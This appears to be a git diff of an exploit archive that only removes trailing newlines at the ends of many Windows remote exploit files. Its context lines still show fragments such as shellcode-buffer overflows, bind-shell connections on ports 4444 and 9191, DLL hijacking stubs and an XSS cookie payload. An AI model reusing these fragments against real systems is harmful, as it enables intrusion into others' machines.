milw0rm.com [2006-09-07] +# milw0rm.com [2006-09-07] \ No newline at end of file diff --git a/platforms/windows/remote/23203.rb b/platforms/windows/remote/23203.rb index 818854904..a9f42ee95 100755 --- a/platforms/windows/remote/23203.rb +++ b/platforms/windows/remote/23203.rb @@ -312,4 +312,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23211.cpp b/platforms/windows/remote/23211.cpp index 3f6a2c717..204f8623f 100755 --- a/platforms/windows/remote/23211.cpp +++ b/platforms/windows/remote/23211.cpp @@ -347,6 +347,4 @@ Service port if (!did_something) help(); } -********** END esv.cpp ********** - - +********** END esv.cpp ********** \ No newline at end of file diff --git a/platforms/windows/remote/23225.rb b/platforms/windows/remote/23225.rb index b9da1f8d3..2cfebac31 100755 --- a/platforms/windows/remote/23225.rb +++ b/platforms/windows/remote/23225.rb @@ -138,4 +138,4 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, content) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23226.rb b/platforms/windows/remote/23226.rb index dd314359e..9a83d297c 100755 --- a/platforms/windows/remote/23226.rb +++ b/platforms/windows/remote/23226.rb @@ -155,4 +155,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23229.cpp b/platforms/windows/remote/23229.cpp index d2d74a9b4..45b322501 100755 --- a/platforms/windows/remote/23229.cpp +++ b/platforms/windows/remote/23229.cpp @@ -838,8 +838,4 @@ exception handler // Exit gracefully. WSACleanup (); return rv; -} - - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/23243.py b/platforms/windows/remote/23243.py index 2f461f5e8..aeb391a19 100755 --- a/platforms/windows/remote/23243.py +++ b/platforms/windows/remote/23243.py @@ -60,4 +60,4 @@ ip_answer=Tkinter.Label(text="IP Address ").pack() ip=Tkinter.StringVar() ip_entry=Tkinter.Entry(textvariable=ip).pack() exploit=Tkinter.Button(text="Exploit",command=exploit).pack() -root.mainloop() +root.mainloop() \ No newline at end of file diff --git a/platforms/windows/remote/23247.c b/platforms/windows/remote/23247.c index 1b69ccae9..cd0b5fbd4 100755 --- a/platforms/windows/remote/23247.c +++ b/platforms/windows/remote/23247.c @@ -228,7 +228,4 @@ int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH) return packet_size; } -/************************************************************************************/ - - - +/************************************************************************************/ \ No newline at end of file diff --git a/platforms/windows/remote/2328.php b/platforms/windows/remote/2328.php index 63f62c0b0..a0b78cf58 100755 --- a/platforms/windows/remote/2328.php +++ b/platforms/windows/remote/2328.php @@ -144,4 +144,4 @@ echo "exploit failed..."; ?> -# milw0rm.com [2006-09-08] +# milw0rm.com [2006-09-08] \ No newline at end of file diff --git a/platforms/windows/remote/23290.rb b/platforms/windows/remote/23290.rb index a3f5944dc..872c508a7 100755 --- a/platforms/windows/remote/23290.rb +++ b/platforms/windows/remote/23290.rb @@ -144,4 +144,4 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(pkt_auth) disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23323.py b/platforms/windows/remote/23323.py index a256810fa..321784c2a 100755 --- a/platforms/windows/remote/23323.py +++ b/platforms/windows/remote/23323.py @@ -103,4 +103,4 @@ def main(argv=None): if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/23329.c b/platforms/windows/remote/23329.c index e6ef4d2aa..b0fff93d6 100755 --- a/platforms/windows/remote/23329.c +++ b/platforms/windows/remote/23329.c @@ -377,4 +377,4 @@ main (int argc,char *argv[]) close(sock); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23334.pl b/platforms/windows/remote/23334.pl index f57c1c975..58e60c0c2 100755 --- a/platforms/windows/remote/23334.pl +++ b/platforms/windows/remote/23334.pl @@ -57,5 +57,4 @@ Connection: close\r print $remote $request; sleep(1); -close $remote; - +close $remote; \ No newline at end of file diff --git a/platforms/windows/remote/23398.pl b/platforms/windows/remote/23398.pl index 4932f94e2..b1209bf0d 100755 --- a/platforms/windows/remote/23398.pl +++ b/platforms/windows/remote/23398.pl @@ -75,4 +75,4 @@ and C:\\Progra~1 are the same thing...\n"; print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n"; print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n"; -print "\n"; +print "\n"; \ No newline at end of file diff --git a/platforms/windows/remote/23399.pl b/platforms/windows/remote/23399.pl index 60010fcbf..48e1cb000 100755 --- a/platforms/windows/remote/23399.pl +++ b/platforms/windows/remote/23399.pl @@ -95,5 +95,4 @@ print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; print "\n"; print "\n--zzz--\n"; -print "\n"; - +print "\n"; \ No newline at end of file diff --git a/platforms/windows/remote/23417.c b/platforms/windows/remote/23417.c index d59405e1d..8302f47d6 100755 --- a/platforms/windows/remote/23417.c +++ b/platforms/windows/remote/23417.c @@ -86,4 +86,4 @@ $request = "GET /SwEzModule.dll?operation=login&autologin=". print "[+] Sending evil request\t..."; close($sock); print "Done\r\n"; -exit; +exit; \ No newline at end of file diff --git a/platforms/windows/remote/23422.txt b/platforms/windows/remote/23422.txt index b8d1b6562..b70e36d91 100755 --- a/platforms/windows/remote/23422.txt +++ b/platforms/windows/remote/23422.txt @@ -48,4 +48,4 @@ Sub CreateExploitPage(strFileName, strSpoofSite, strRealSite, strLinkText) a.WriteLine("") a.WriteLine("") a.Close -End Sub +End Sub \ No newline at end of file diff --git a/platforms/windows/remote/23436.c b/platforms/windows/remote/23436.c index a38bf2582..ad23abfbc 100755 --- a/platforms/windows/remote/23436.c +++ b/platforms/windows/remote/23436.c @@ -300,5 +300,4 @@ if(!sock) return -1; start_auth(sock,argv[2],atoi(argv[3])); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/23437.c b/platforms/windows/remote/23437.c index 06233769c..04fcee81d 100755 --- a/platforms/windows/remote/23437.c +++ b/platforms/windows/remote/23437.c @@ -252,4 +252,4 @@ if(!sock) return -1; start_auth(sock,argv[2],atoi(argv[3]),var); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/2345.pl b/platforms/windows/remote/2345.pl index b0585166c..194fd84c1 100755 --- a/platforms/windows/remote/2345.pl +++ b/platforms/windows/remote/2345.pl @@ -93,4 +93,4 @@ system("telnet $host 4444"); close $socket; exit; -# milw0rm.com [2006-09-11] +# milw0rm.com [2006-09-11] \ No newline at end of file diff --git a/platforms/windows/remote/23464.pl b/platforms/windows/remote/23464.pl index 41e246268..43268f7f6 100755 --- a/platforms/windows/remote/23464.pl +++ b/platforms/windows/remote/23464.pl @@ -114,4 +114,4 @@ undef($ccon); } print("[*] server closed.\n"); $daemon->close(); -undef($daemon); +undef($daemon); \ No newline at end of file diff --git a/platforms/windows/remote/23491.pl b/platforms/windows/remote/23491.pl index 50c4e7946..c53784270 100755 --- a/platforms/windows/remote/23491.pl +++ b/platforms/windows/remote/23491.pl @@ -140,5 +140,4 @@ close($socket); print "[~] trying to connect on port 9191\n"; $socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "9191", Photo => tcp) || die "[-] damn ... connect to spawn shell failed\n"; close($socket); -print "[+] shell spawned on port 9191 ... you are lucky =)\n"; - +print "[+] shell spawned on port 9191 ... you are lucky =)\n"; \ No newline at end of file diff --git a/platforms/windows/remote/23492.c b/platforms/windows/remote/23492.c index f7f8f7163..6ace8a986 100755 --- a/platforms/windows/remote/23492.c +++ b/platforms/windows/remote/23492.c @@ -191,5 +191,4 @@ int get_shell(int bsh) close(bsh); return 1; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/23502.c b/platforms/windows/remote/23502.c index 3f064c287..26fd185be 100755 --- a/platforms/windows/remote/23502.c +++ b/platforms/windows/remote/23502.c @@ -252,4 +252,4 @@ int main(int argc,char **argv) // [EOF] return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23509.c b/platforms/windows/remote/23509.c index 1c3ab039e..09fcac6ae 100755 --- a/platforms/windows/remote/23509.c +++ b/platforms/windows/remote/23509.c @@ -231,5 +231,4 @@ int main(int argc, char *argv[]) printf("[+] BadString Sended (%d)\n",len); } return 0; - } - + } \ No newline at end of file diff --git a/platforms/windows/remote/23514.pl b/platforms/windows/remote/23514.pl index b32f72ab5..f909e1036 100755 --- a/platforms/windows/remote/23514.pl +++ b/platforms/windows/remote/23514.pl @@ -74,4 +74,4 @@ sleep(2); close($target); print "Done.\n"; -exit; +exit; \ No newline at end of file diff --git a/platforms/windows/remote/2355.pm b/platforms/windows/remote/2355.pm index f86183e5f..a4f672d4a 100755 --- a/platforms/windows/remote/2355.pm +++ b/platforms/windows/remote/2355.pm @@ -230,4 +230,4 @@ sub Exploit { 1; -# milw0rm.com [2006-09-13] +# milw0rm.com [2006-09-13] \ No newline at end of file diff --git a/platforms/windows/remote/2358.c b/platforms/windows/remote/2358.c index 649104408..44f34e5f4 100755 --- a/platforms/windows/remote/2358.c +++ b/platforms/windows/remote/2358.c @@ -171,4 +171,4 @@ void main(int argc, char **argv) printf("[+] exploit write to %s success!\n", file); } -// milw0rm.com [2006-09-13] +// milw0rm.com [2006-09-13] \ No newline at end of file diff --git a/platforms/windows/remote/23591.c b/platforms/windows/remote/23591.c index 057696db0..85f4cebd4 100755 --- a/platforms/windows/remote/23591.c +++ b/platforms/windows/remote/23591.c @@ -198,4 +198,4 @@ int main(int argc, char **argv) { printf("[+] done.\n"); exit(0); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23592.c b/platforms/windows/remote/23592.c index 661fe80a3..332c0b671 100755 --- a/platforms/windows/remote/23592.c +++ b/platforms/windows/remote/23592.c @@ -176,4 +176,4 @@ int connect_tcp(char *host, int port) } return sock; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23608.pl b/platforms/windows/remote/23608.pl index 33b7bd943..6dd1c53f8 100755 --- a/platforms/windows/remote/23608.pl +++ b/platforms/windows/remote/23608.pl @@ -62,6 +62,4 @@ close($victim); print "[+] Done!\n"; exit; -######################################################################### - - +######################################################################### \ No newline at end of file diff --git a/platforms/windows/remote/23649.rb b/platforms/windows/remote/23649.rb index b76924013..5e405883f 100755 --- a/platforms/windows/remote/23649.rb +++ b/platforms/windows/remote/23649.rb @@ -548,4 +548,4 @@ $winFunc::CreateThread(0,0,$x,0,0,0)" sql = query_builder(path,"",0,execute) result = mssql_query(sql,false) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23668.txt b/platforms/windows/remote/23668.txt index 4adc3ab85..74003ad32 100755 --- a/platforms/windows/remote/23668.txt +++ b/platforms/windows/remote/23668.txt @@ -32,4 +32,4 @@ alert('file exists'); alert('file does not exist'); } } - + \ No newline at end of file diff --git a/platforms/windows/remote/23714.c b/platforms/windows/remote/23714.c index 4c2b6dc4f..f00a7fbb3 100755 --- a/platforms/windows/remote/23714.c +++ b/platforms/windows/remote/23714.c @@ -151,4 +151,4 @@ int main(int argc, char *argv[]) closesocket(mysocket); WSACleanup(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23732.c b/platforms/windows/remote/23732.c index 551253c36..12ca078e6 100755 --- a/platforms/windows/remote/23732.c +++ b/platforms/windows/remote/23732.c @@ -141,5 +141,4 @@ printf(" Exploit envoye... tester le port 4444\n\n"); closesocket(sock); WSACleanup(); -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/23733.c b/platforms/windows/remote/23733.c index b97667d63..cc2c98e60 100755 --- a/platforms/windows/remote/23733.c +++ b/platforms/windows/remote/23733.c @@ -333,5 +333,4 @@ die(char *argv) exit(1); } -/* A poil! */ - +/* A poil! */ \ No newline at end of file diff --git a/platforms/windows/remote/23734.c b/platforms/windows/remote/23734.c index 177a48c54..b3d5f203f 100755 --- a/platforms/windows/remote/23734.c +++ b/platforms/windows/remote/23734.c @@ -144,4 +144,4 @@ int main( int argc, char *argv[] ) } - + \ No newline at end of file diff --git a/platforms/windows/remote/23741.c b/platforms/windows/remote/23741.c index 422c595a0..9d589c1bd 100755 --- a/platforms/windows/remote/23741.c +++ b/platforms/windows/remote/23741.c @@ -282,4 +282,4 @@ memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); /* return sucess. */ return 0; - } + } \ No newline at end of file diff --git a/platforms/windows/remote/23763.c b/platforms/windows/remote/23763.c index 6dff1a87f..f2d1cde74 100755 --- a/platforms/windows/remote/23763.c +++ b/platforms/windows/remote/23763.c @@ -752,7 +752,4 @@ exit_try: } return 0; -} - - - +} \ No newline at end of file diff --git a/platforms/windows/remote/23790.htm b/platforms/windows/remote/23790.htm index baf93d492..580210c66 100755 --- a/platforms/windows/remote/23790.htm +++ b/platforms/windows/remote/23790.htm @@ -31,4 +31,4 @@ window.open("file:javascript:alert(document.cookie);","_search") },5000); </script> --------------------------------End--------------------------------- +-------------------------------End--------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/23796.html b/platforms/windows/remote/23796.html index 6066cc562..51ad76eeb 100755 --- a/platforms/windows/remote/23796.html +++ b/platforms/windows/remote/23796.html @@ -20,5 +20,4 @@ to execute more - - + \ No newline at end of file diff --git a/platforms/windows/remote/23847.c b/platforms/windows/remote/23847.c index 4db79e4f1..7cd840a8d 100755 --- a/platforms/windows/remote/23847.c +++ b/platforms/windows/remote/23847.c @@ -300,4 +300,4 @@ fprintf (stderr, "# done.\n"); fprintf (stderr, "# make sure we are in, dude :)\n\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/23887.rb b/platforms/windows/remote/23887.rb index 7c16af162..5ebf944f5 100755 --- a/platforms/windows/remote/23887.rb +++ b/platforms/windows/remote/23887.rb @@ -156,4 +156,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/23926.txt b/platforms/windows/remote/23926.txt index caea54268..cd060e6f1 100755 --- a/platforms/windows/remote/23926.txt +++ b/platforms/windows/remote/23926.txt @@ -43,4 +43,4 @@ document.write(sPath) '&H0028=%username% '&H0029=%windir% - + \ No newline at end of file diff --git a/platforms/windows/remote/23969.rb b/platforms/windows/remote/23969.rb index 051c8a129..5471d0b75 100755 --- a/platforms/windows/remote/23969.rb +++ b/platforms/windows/remote/23969.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/2401.c b/platforms/windows/remote/2401.c index 41614d553..fc7a6ba1b 100755 --- a/platforms/windows/remote/2401.c +++ b/platforms/windows/remote/2401.c @@ -182,4 +182,4 @@ getchar(); return 0; } -// milw0rm.com [2006-09-20] +// milw0rm.com [2006-09-20] \ No newline at end of file diff --git a/platforms/windows/remote/24012.html b/platforms/windows/remote/24012.html index d7f65665f..7ec7bdd17 100755 --- a/platforms/windows/remote/24012.html +++ b/platforms/windows/remote/24012.html @@ -63,4 +63,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\""); - + \ No newline at end of file diff --git a/platforms/windows/remote/24020.rb b/platforms/windows/remote/24020.rb index e57605b70..bdb581dbb 100755 --- a/platforms/windows/remote/24020.rb +++ b/platforms/windows/remote/24020.rb @@ -236,4 +236,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/24028.pl b/platforms/windows/remote/24028.pl index 0f36c38c9..befe50e4f 100755 --- a/platforms/windows/remote/24028.pl +++ b/platforms/windows/remote/24028.pl @@ -76,4 +76,4 @@ print "+++++++++++++++++++++++\n\n"; $smtp = Net::SMTP->new($remote); $smtp->mail($buffer . $ret . $nop . $shellcode); -print "\nNow telnet to your cmd shell port 9191 \n"; +print "\nNow telnet to your cmd shell port 9191 \n"; \ No newline at end of file diff --git a/platforms/windows/remote/2403.c b/platforms/windows/remote/2403.c index 3f47aa56b..8f43ae50c 100755 --- a/platforms/windows/remote/2403.c +++ b/platforms/windows/remote/2403.c @@ -204,4 +204,4 @@ void main(int argc, char **argv) printf("[+] exploit write to %s success!\n", file); } -// milw0rm.com [2006-09-20] +// milw0rm.com [2006-09-20] \ No newline at end of file diff --git a/platforms/windows/remote/2408.pl b/platforms/windows/remote/2408.pl index b77b7bac9..529835c7b 100755 --- a/platforms/windows/remote/2408.pl +++ b/platforms/windows/remote/2408.pl @@ -152,4 +152,4 @@ sub convert_shellcode { return $code; } -# milw0rm.com [2006-09-21] +# milw0rm.com [2006-09-21] \ No newline at end of file diff --git a/platforms/windows/remote/24133.rb b/platforms/windows/remote/24133.rb index 0038b215a..1e0742e99 100755 --- a/platforms/windows/remote/24133.rb +++ b/platforms/windows/remote/24133.rb @@ -148,5 +148,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/2425.html b/platforms/windows/remote/2425.html index 304ac4434..02d1e1cfc 100755 --- a/platforms/windows/remote/2425.html +++ b/platforms/windows/remote/2425.html @@ -68,4 +68,4 @@ v\:* { behavior: url(#VMLRender); } -# milw0rm.com [2006-09-24] +# milw0rm.com [2006-09-24] \ No newline at end of file diff --git a/platforms/windows/remote/2426.pl b/platforms/windows/remote/2426.pl index 96053c683..ffb2cf192 100755 --- a/platforms/windows/remote/2426.pl +++ b/platforms/windows/remote/2426.pl @@ -162,4 +162,4 @@ sub convert_shellcode { return $code; } -# milw0rm.com [2006-09-25] +# milw0rm.com [2006-09-25] \ No newline at end of file diff --git a/platforms/windows/remote/24328.txt b/platforms/windows/remote/24328.txt index 41c9c8176..50207d47a 100755 --- a/platforms/windows/remote/24328.txt +++ b/platforms/windows/remote/24328.txt @@ -12,4 +12,4 @@ And by "Berend-Jan Wever" : d = window.open().document; d.write("x"); d.body.innerHTML = "****** -
Fuck Ie
+
Fuck Ie
\ No newline at end of file diff --git a/platforms/windows/remote/34532.c b/platforms/windows/remote/34532.c index f1738a022..9ca752520 100755 --- a/platforms/windows/remote/34532.c +++ b/platforms/windows/remote/34532.c @@ -31,4 +31,4 @@ int main() WinExec("calc", 0); exit(0); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/34542.c b/platforms/windows/remote/34542.c index 4669e39cd..4815f6d02 100755 --- a/platforms/windows/remote/34542.c +++ b/platforms/windows/remote/34542.c @@ -42,4 +42,4 @@ BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) - {mes();} + {mes();} \ No newline at end of file diff --git a/platforms/windows/remote/3462.cpp b/platforms/windows/remote/3462.cpp index 58b423e22..bc392f256 100755 --- a/platforms/windows/remote/3462.cpp +++ b/platforms/windows/remote/3462.cpp @@ -177,4 +177,4 @@ char end[]= } -// milw0rm.com [2007-03-12] +// milw0rm.com [2007-03-12] \ No newline at end of file diff --git a/platforms/windows/remote/3463.cpp b/platforms/windows/remote/3463.cpp index 1fa7c4a78..ec4e75356 100755 --- a/platforms/windows/remote/3463.cpp +++ b/platforms/windows/remote/3463.cpp @@ -227,4 +227,4 @@ char postend[]="\r\n.\r\n"; return 0; } -// milw0rm.com [2007-03-12] +// milw0rm.com [2007-03-12] \ No newline at end of file diff --git a/platforms/windows/remote/34647.txt b/platforms/windows/remote/34647.txt index b0432723e..2ca7f2432 100755 --- a/platforms/windows/remote/34647.txt +++ b/platforms/windows/remote/34647.txt @@ -290,4 +290,4 @@ class Metasploit3 < Msf::Exploit::Remote file_create(sploit) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/34685.py b/platforms/windows/remote/34685.py index 2796d7fec..da1ea2ae1 100755 --- a/platforms/windows/remote/34685.py +++ b/platforms/windows/remote/34685.py @@ -36,4 +36,4 @@ try: print 'response received' except: - print 'error contacting server' + print 'error contacting server' \ No newline at end of file diff --git a/platforms/windows/remote/34696.c b/platforms/windows/remote/34696.c index 812aab0bf..433d97c51 100755 --- a/platforms/windows/remote/34696.c +++ b/platforms/windows/remote/34696.c @@ -43,4 +43,4 @@ case DLL_THREAD_DETACH: break; } return TRUE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/34697.c b/platforms/windows/remote/34697.c index e3d22411c..6b1387d00 100755 --- a/platforms/windows/remote/34697.c +++ b/platforms/windows/remote/34697.c @@ -45,4 +45,4 @@ case DLL_THREAD_DETACH: break; } return TRUE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/3474.py b/platforms/windows/remote/3474.py index a4807fabb..ce2180e5b 100755 --- a/platforms/windows/remote/3474.py +++ b/platforms/windows/remote/3474.py @@ -93,4 +93,4 @@ if __name__ == '__main__': time.sleep(2) ConnectRemoteShell(target) -# milw0rm.com [2007-03-14] +# milw0rm.com [2007-03-14] \ No newline at end of file diff --git a/platforms/windows/remote/3482.pl b/platforms/windows/remote/3482.pl index 9be8a392d..1eec07365 100755 --- a/platforms/windows/remote/3482.pl +++ b/platforms/windows/remote/3482.pl @@ -100,4 +100,4 @@ else print "Cannot connect to $ARGV[0]:21\n"; } -# milw0rm.com [2007-03-15] +# milw0rm.com [2007-03-15] \ No newline at end of file diff --git a/platforms/windows/remote/34823.c b/platforms/windows/remote/34823.c index 987a7d663..42bde961c 100755 --- a/platforms/windows/remote/34823.c +++ b/platforms/windows/remote/34823.c @@ -45,4 +45,4 @@ case DLL_THREAD_DETACH: break; } return TRUE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/34829.c b/platforms/windows/remote/34829.c index dcda21daf..3709c20b5 100755 --- a/platforms/windows/remote/34829.c +++ b/platforms/windows/remote/34829.c @@ -40,4 +40,4 @@ BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) - {mes();} + {mes();} \ No newline at end of file diff --git a/platforms/windows/remote/34830.c b/platforms/windows/remote/34830.c index a1c019840..b3276a455 100755 --- a/platforms/windows/remote/34830.c +++ b/platforms/windows/remote/34830.c @@ -44,5 +44,4 @@ BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) - {mes();} - + {mes();} \ No newline at end of file diff --git a/platforms/windows/remote/34831.c b/platforms/windows/remote/34831.c index a3cc556c0..0e396da0c 100755 --- a/platforms/windows/remote/34831.c +++ b/platforms/windows/remote/34831.c @@ -42,4 +42,4 @@ BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) - {mes();} + {mes();} \ No newline at end of file diff --git a/platforms/windows/remote/34832.c b/platforms/windows/remote/34832.c index c0e38d333..971d22630 100755 --- a/platforms/windows/remote/34832.c +++ b/platforms/windows/remote/34832.c @@ -42,4 +42,4 @@ BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) - {mes();} + {mes();} \ No newline at end of file diff --git a/platforms/windows/remote/34838.c b/platforms/windows/remote/34838.c index a9f5a58f3..6c1f8c7ca 100755 --- a/platforms/windows/remote/34838.c +++ b/platforms/windows/remote/34838.c @@ -52,5 +52,4 @@ case DLL_THREAD_DETACH: break; } return TRUE; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/34844.c b/platforms/windows/remote/34844.c index ed8cb53d5..ac0410016 100755 --- a/platforms/windows/remote/34844.c +++ b/platforms/windows/remote/34844.c @@ -82,5 +82,4 @@ int evil() WinExec("calc", 0); exit(0); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/34848.c b/platforms/windows/remote/34848.c index 723126954..809c9e441 100755 --- a/platforms/windows/remote/34848.c +++ b/platforms/windows/remote/34848.c @@ -66,5 +66,4 @@ case DLL_THREAD_DETACH: break; } return TRUE; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/34856.py b/platforms/windows/remote/34856.py index 3d659fabd..2559a0c87 100755 --- a/platforms/windows/remote/34856.py +++ b/platforms/windows/remote/34856.py @@ -251,4 +251,4 @@ handle.close() print "\nWe are now done." print "If targeting XP, your shell will be instant" print "If targeting Windows Vista and later, you will recieve your shell within 6 seconds if the target has not enabled EAF protection" -print "Otherwise, if the target has enabled EAF protection, expect your shell within 35 seconds." +print "Otherwise, if the target has enabled EAF protection, expect your shell within 35 seconds." \ No newline at end of file diff --git a/platforms/windows/remote/34869.c b/platforms/windows/remote/34869.c index 62c99857a..dcf2d2210 100755 --- a/platforms/windows/remote/34869.c +++ b/platforms/windows/remote/34869.c @@ -95,4 +95,4 @@ int evil() special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member -============================================= +============================================= \ No newline at end of file diff --git a/platforms/windows/remote/34931.c b/platforms/windows/remote/34931.c index b482443e9..ae3f3ea6b 100755 --- a/platforms/windows/remote/34931.c +++ b/platforms/windows/remote/34931.c @@ -54,4 +54,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) return 0; } -/* ~/.wine/drive_c/MinGW/bin/wine gcc.exe lpksetup.c -o oci.dll */ +/* ~/.wine/drive_c/MinGW/bin/wine gcc.exe lpksetup.c -o oci.dll */ \ No newline at end of file diff --git a/platforms/windows/remote/3495.txt b/platforms/windows/remote/3495.txt index ef31c2582..9b07511db 100755 --- a/platforms/windows/remote/3495.txt +++ b/platforms/windows/remote/3495.txt @@ -117,4 +117,4 @@ if __name__ == '__main__': time.sleep(3) ConnectRemoteShell(target) -# milw0rm.com [2007-03-16] +# milw0rm.com [2007-03-16] \ No newline at end of file diff --git a/platforms/windows/remote/34978.c b/platforms/windows/remote/34978.c index a9298ba57..db0b146ec 100755 --- a/platforms/windows/remote/34978.c +++ b/platforms/windows/remote/34978.c @@ -27,4 +27,4 @@ BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/35005.html b/platforms/windows/remote/35005.html index 67d75fd9d..56bdcaad1 100755 --- a/platforms/windows/remote/35005.html +++ b/platforms/windows/remote/35005.html @@ -139,5 +139,4 @@ recalc(); setint(); - - + \ No newline at end of file diff --git a/platforms/windows/remote/35006.html b/platforms/windows/remote/35006.html index b57c9dc10..5ee35a4bd 100755 --- a/platforms/windows/remote/35006.html +++ b/platforms/windows/remote/35006.html @@ -54,4 +54,4 @@ function calc_seed() } - + \ No newline at end of file diff --git a/platforms/windows/remote/35007.c b/platforms/windows/remote/35007.c index 1a79264c3..d02882e0d 100755 --- a/platforms/windows/remote/35007.c +++ b/platforms/windows/remote/35007.c @@ -69,6 +69,4 @@ BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) int dll_mll() { MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK); -} - - +} \ No newline at end of file diff --git a/platforms/windows/remote/35130.txt b/platforms/windows/remote/35130.txt index 6221946cf..b0601813b 100755 --- a/platforms/windows/remote/35130.txt +++ b/platforms/windows/remote/35130.txt @@ -28,4 +28,4 @@ curl_close($ch); echo $resp; ?> -http://www.example.com/browse/search?query= +http://www.example.com/browse/search?query= \ No newline at end of file diff --git a/platforms/windows/remote/35171.c b/platforms/windows/remote/35171.c index c103e8c7f..4a630f34f 100755 --- a/platforms/windows/remote/35171.c +++ b/platforms/windows/remote/35171.c @@ -15,5 +15,4 @@ int pwnme() MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); exit(0); return 0; -} - +} \ No newline at end of file diff --git a/platforms/windows/remote/35188.py b/platforms/windows/remote/35188.py index 314f78a1e..6a4e3dabc 100755 --- a/platforms/windows/remote/35188.py +++ b/platforms/windows/remote/35188.py @@ -69,5 +69,4 @@ print s.recv(8192) s.send('PASV ' + bad_stuff + '\r\n') print s.recv(8192) -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/35190.html b/platforms/windows/remote/35190.html index b92144f98..921d915a6 100755 --- a/platforms/windows/remote/35190.html +++ b/platforms/windows/remote/35190.html @@ -68,6 +68,4 @@ eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000 eip=41414141 esp=0013d8c8 ebp=0013d8e8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +0x41414140: -41414141 ?? ??? - - +41414141 ?? ??? \ No newline at end of file diff --git a/platforms/windows/remote/35225.c b/platforms/windows/remote/35225.c index 0080b4c7a..689af41e1 100755 --- a/platforms/windows/remote/35225.c +++ b/platforms/windows/remote/35225.c @@ -29,4 +29,4 @@ int main(int argc, char* argv[]) return 1; } return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/35226.py b/platforms/windows/remote/35226.py index 756cb41aa..64a01353f 100755 --- a/platforms/windows/remote/35226.py +++ b/platforms/windows/remote/35226.py @@ -118,4 +118,4 @@ print "Sending shellcode packet (size: 0x%x)" % (len(shellcode)) s.sendall(shellcode) print "avguard response:" print s.recv(1024) -sys.exit() +sys.exit() \ No newline at end of file diff --git a/platforms/windows/remote/35230.rb b/platforms/windows/remote/35230.rb index 80be98bf5..b929ef648 100755 --- a/platforms/windows/remote/35230.rb +++ b/platforms/windows/remote/35230.rb @@ -440,4 +440,4 @@ end function end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/3531.py b/platforms/windows/remote/3531.py index 909908307..b8168e2b4 100755 --- a/platforms/windows/remote/3531.py +++ b/platforms/windows/remote/3531.py @@ -118,4 +118,4 @@ if __name__=="__main__": time.sleep(3) ConnectRemoteShell(target) -# milw0rm.com [2007-03-21] +# milw0rm.com [2007-03-21] \ No newline at end of file diff --git a/platforms/windows/remote/35318.c b/platforms/windows/remote/35318.c 